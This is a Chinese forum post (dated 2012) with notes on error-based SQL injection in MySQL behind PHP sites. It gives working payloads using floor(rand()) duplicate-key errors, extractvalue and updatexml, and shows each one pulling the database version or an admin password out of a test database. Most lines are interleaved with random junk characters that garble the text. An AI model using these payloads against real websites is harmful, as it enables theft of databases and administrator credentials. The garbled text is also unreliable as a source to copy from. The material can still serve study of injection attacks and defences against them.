放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
5 b, ]5 T1 w( D; F- Z2 i3 u3 `实际测试环境:, Q3 s. S# `5 i5 I1 c
S3 k4 n( ?4 a
R. \. ]* s. x% ]& u5 o. M
mysql> show tables;
7 V: S4 C$ C' a+ U7 U2 Z# N3 h+----------------+
6 H8 K& w# U) O4 p/ l| Tables_in_test |/ [' f* h# T9 r
+----------------+
( t3 _7 |' ^6 e+ I5 f8 L& Y| admin |
, W- c* \: n4 D1 F| article |
! r# T! A8 Q" f0 v- G+----------------+: m5 t8 s+ }% B3 s. @) ]0 \5 t
! v P, d0 N' t: j, @% S . _7 ~( ^: m1 p3 _5 j2 T( ], W
4 f% j" C( }2 k# K0 N$ n1 lmysql> describe admin;7 k, U( x: Y- y
+-------+------------------+------+-----+---------+----------------+
v* @/ F4 ~7 l) W| Field | Type | Null | Key | Default | Extra |) `+ j( V3 r6 v* `$ K
+-------+------------------+------+-----+---------+----------------+* v/ S+ R+ D; D- l+ f
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |: Q/ D) T% e0 T/ _6 m
| user | varchar(50) | NO | | NULL | |) L; p6 E0 O, |4 E0 X, [/ _& b
| pass | varchar(50) | NO | | NULL | |
! Q9 g2 h6 D* u4 S! q2 D3 j# p+-------+------------------+------+-----+---------+----------------+. U8 v2 a; d1 \% e
: i7 ~' d F$ d' g# Q% y* V) ~% A
) a) X, H( e8 q. ^6 h
$ L* I2 j8 p( Z- X9 d+ @* }6 Vmysql> describe article;- w. ]5 z0 o$ M* Q3 R8 x& j* T
+---------+------------------+------+-----+---------+----------------+
9 Z; `( M; i7 `| Field | Type | Null | Key | Default | Extra |) E: j. ~; N! K
+---------+------------------+------+-----+---------+----------------+. t4 d4 S4 l8 i5 q8 l" e
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
& ]( Z+ d( x$ _2 l3 v| title | varchar(50) | NO | | NULL | |. F7 p8 N: U3 v
| content | varchar(50) | NO | | NULL | |
2 B% O5 H& w7 v5 t3 u+---------+------------------+------+-----+---------+----------------+
& }9 \# d1 x( Q/ V) C3 r7 |1、通过floor报错+ g4 ^- a1 k+ Q$ W& L2 z
可以通过如下一些利用代码/ _5 {6 ^( [2 C
& _- |4 @/ d+ Q; w/ t. y( I
* q/ `: B' |% n6 _
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x# J* U4 t& Y" c5 a) m* s& @' t
from information_schema.tables group by x)a);
& D% Q6 E( k+ J / O" n; w* Q |6 L
$ T) } B1 G- N! B2 v& H. N: W
and (select count(*) from (select 1 union select null union select !1)x9 i" N5 c$ _- l
group by concat((select table_name from information_schema.tables limit 1),5 u( V& G! Y: Y! y: o D3 m
floor(rand(0)*2)));; W; s( Q6 K$ I& |) s
举例如下:4 T/ V5 |# O+ T8 x/ \! H
首先进行正常查询:
0 A) k4 s& t: J% T: f7 V/ m4 i7 g0 L / I, S L# _; |( P
mysql> select * from article where id = 1;
3 _7 u4 v& W5 O: L+----+-------+---------+
: K2 w, Q1 A1 M| id | title | content |
# o# P9 Z8 Y% z: w) P+----+-------+---------+1 c/ o A# D9 e7 k5 D5 D* W
| 1 | test | do it |
# P% M4 C ~1 d+----+-------+---------+ v0 W! _: i# {7 h& p% E
假如id输入存在注入的话,可以通过如下语句进行报错。9 M, h1 s: i/ m; u
1 z+ v; S& t, i. Y! r9 D( @
0 e1 m1 K/ l, B% r5 ?# T( F5 h; m" }mysql> select * from article where id = 1 and (select 1 from+ R# T8 b9 Q) F" `8 H
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
# h. w& k+ @0 \ UERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'& T. W+ F. M$ l2 ^6 d, _+ T2 o
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。 Y4 z; ?0 V6 H$ J% l8 V
例如我们需要查询管理员用户名和密码:3 m N, y8 x: s7 W
Method1:
2 C/ P/ S/ Y( M2 ]6 T 2 H& Q$ x, D \7 K" O' R9 K w: _8 m
: ?: c6 ~! r) g) ~& z& I: kmysql> select * from article where id = 1 and (select 1 from
0 L( v- E) Y. p8 U @(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
$ r' O/ `; c- N. o# q X' Mfrom information_schema.tables group by x)a);1 |" ^+ z: p% F9 o' g0 E* W; X1 w
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
. A' v1 E9 \5 M1 x3 b. zMethod2:
( a# y6 u% y" P }" ^* A - N- L D q4 |
; f: E& G, |% ]& ~' A0 h3 {mysql> select * from article where id = 1 and (select count(*)% z; R! l+ J- B
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),1 [) O* `9 [. p! g1 x8 A; ^
floor(rand(0)*2)));
# x* c6 y. i2 E/ ^+ ~( e" M6 mERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key') }; L+ b9 W0 f: {
2、ExtractValue
8 R' o; [$ v! L2 a测试语句如下; @3 p$ e7 b' `3 x, K
) L8 O0 Y1 Q7 ] T, E
, I+ F; i6 Y1 m. G2 q- |$ a+ G- jand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
8 T5 e% h+ s1 p. g( h$ y实际测试过程7 ^' c+ c1 ]6 x4 l2 p0 ?$ c
9 [/ C6 R! O: h3 r) C8 V j1 n
: \$ @- R0 ]/ u! f, Y0 \' M. nmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
4 t. M6 B6 z5 b: X( C(select pass from admin limit 1)));--
' M9 }% p; a4 H, ^' _4 I5 WERROR 1105 (HY000): XPATH syntax error: '\admin888'
* N7 G1 n$ A1 D7 o5 ^2 q! _3、UpdateXml0 w7 {& c! N7 W2 o
测试语句; Q7 [6 e' S. Q/ y
7 v# f; r8 D& T1 ^3 O9 B! X" g
8 J3 R7 h. i5 ?" @6 \) C ]1 A6 gand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))* [9 L; Y9 Z: B3 k1 B* ]
实际测试过程6 ^, S7 i( h/ H3 \. S6 H2 W) Y
. P C) K v& \% i7 n
1 b7 H& l0 u& K; F/ M/ {, jmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
9 h. r& V) Y: K }(select pass from admin limit 1),0x5e24),1));
2 t5 g$ q) M/ S, A7 S# C) RERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
$ y; ?4 Q7 `# k, v4 MAll, thanks foreign guys.
. Y9 Z1 e6 U, E- J
& k! V' p! q9 O- H6 p: @, d# i# c# ?) J; R3 @$ u
|
发表于 2012-12-10 10:28:51
收藏
支持
反对